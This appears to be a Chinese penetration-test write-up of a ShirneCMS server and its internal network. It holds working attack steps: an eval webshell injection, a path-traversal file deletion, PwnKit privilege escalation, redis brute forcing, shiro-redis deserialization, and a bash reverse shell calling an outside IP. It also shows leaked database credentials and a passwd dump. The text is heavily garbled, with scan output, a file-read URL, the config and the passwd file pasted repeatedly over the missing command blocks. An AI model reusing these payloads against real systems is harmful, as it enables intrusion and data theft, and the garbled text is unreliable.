80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
6

寻找调用整个函数的地方挺多的。

前端和后端都存在很多调用点。这里选择后端的

application/admin/controller/shop/BrandController.php

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
7

首先上传一个图片再进行抓包修改包 /uploads/../../runtime/install.lock

在删除的代码之前必须满足存在uploads目录 /uploads/../../runtime/install.lock

访问 index.php/task/install 加上 ','xxx'=>eval($_REQUEST['cmd']),//

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
8

访问主页即可获取shell

3.1 web主机 linux提权

发现是ubuntu16.04 版本提权exp CVE-2021-4034 https://github.com/luijait/PwnKit-Exploit

本地编译后在上传到目标上提权即可

查看 cat /etc/shadow

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
9

3.2 配置frp内网上线msf

设置frp 内网就能使用msf 和cs

frpc

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test0

frps

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test1

msf上线

生成后门

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test2

监听

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test3

监听成功截图

3.3 开启代理渗透

开启代理内网渗透

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test4

background

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test5

修改配置文件 proxychains4.conf

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test6

扫描 192.168.10.175 端口端口开放如下

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test7

可以看到 8080端口和6379端口开放

3.4 穷举redis端口

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test8

得到密码 abc123

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test9

KEYS ** 获取所有值

4.1 shiro redis 反序列化

通过搜索引擎找到此源码 https://github.com/alexxiyang/shiro-redis-spring-tutorial

下载到本地用idea开分析

org/crazycake/shiro/serializer/ObjectSerializer.java

这里存在反序列化

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',0

deserialize被get调用

org/crazycake/shiro/RedisCache.java

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',1

就是在获取缓存的时候调用反序列化还原对象。

查看redis缓存内容是反序列化格式

从依赖中看到 cb

直接用cb生成反序列化内容传入到redis即可在通过调用即可获取执行命令

4.2 编写反序列化脚本

执行命令Evil类要继承 AbstractTranslet

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',2

bash -i >&/dev/tcp/103.148.244.151/8877 0>&1 base64 的内容 YmFzaCAtaSA+Ji9kZXYvdGNwLzEwMy4xNDguMjQ0LjE1MS84ODc3IDA+JjE=

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',3

打包成jar包然后在隧道里面执行。

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',4

截图

登录修改cookie 触发反序列化

nc监听成功

4.3 linux提权解决乱码技巧

首先使用frp nc反弹到本地解决乱码等问题

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',5

kali的话输入 bash

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',6

效果图

5.1 读取ssh密钥登录pc1

发现/home/web/.ssh可以访问发现私钥 id_rsa

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',7

保存为id_rsa 权限设置 600 ssh登录pc1边界主机

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',8

登录之后发现是root权限。

5.2 pc1主机信息收集

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',9

用户信息

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin0

5.3 整合到msf

方便管理上msf后门执行

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin1

5.4 fscan扫描内网

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
